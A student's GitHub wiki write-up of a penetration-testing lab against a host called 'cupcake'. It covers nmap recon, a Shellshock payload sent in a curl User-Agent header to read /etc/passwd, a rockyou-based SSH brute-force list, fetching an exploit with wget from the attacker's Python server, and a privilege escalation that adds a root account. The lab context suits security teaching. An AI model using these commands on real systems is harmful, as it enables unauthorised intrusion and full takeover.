Exploiting Cupcake - tmansfield42/Tech-Journal GitHub Wiki

Summary

In this lab we did our first real attack. We started with passive recon, namp scans, version fingerprinting, etc. and moved on to gaining access & ended with privilege escalation to our own root account.

Tech Journal points:

Here, I am going to describe how I completed each objective as per Deliverable 11.

How did you determine the versions of the two services exposed by cupcake?

I ran sudo nmap -sV -O -A 10.0.5.23 to find two open ports, 80 and 22

How you dealt with parsing nmap result with nmaptocsv

This was relatively easy. Just do sudo nmap -sT -sV --top-ports=100 10.0.5.23 -Pn -oG michaellist.txt and using this information, do: nmaptocsv -l michaellist.txt -d ',' and copy paste the results into a google sheets file

I had some trouble getting nmaptocsv to install, so I just looked my error up and had to use pipx to install nmap to csv: pipx install nmaptocsv

The techniques you used to invoke remote code execution

There were two commands that we used to execute our own commands on the cupcake machine remotely: sudo nmap -sV -p 80 --script http-shellshock --sciprt-args uri=/cgi-bin/status,cmd="echo ; echo ; /usr/bin/whoami" 10.0.5.23 along with:

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status

The generation of a list of passwords and subsequent ssh bruteforce

  • Make sure you're in /usr/share/wordlists

  • Unzip rockyou.txt.gz

  • cat rockyou.txt | grep -i "samwise" > mylist.txt

Transfer of files using python and wget or any other mechanism you chose

  • If you use searchsploit module 40839, you can spin up an http server really quick on your kali machine by doing python3 -m http.server <ephemeralporthere>

  • on cupcake, make your own directory and type wget http://<personalkaliboxIP>:<chosenEphemeralPort>/40839.c

Compiling and running a privilege escalation exploit (It can be different than the demo!)

  • Assuming you're using module 40839, run the script installed from your spun up http server and it'll add a new entry to /etc/passwd, and it'll save a .bak for /etc/passwd in /tmp/passwd.bak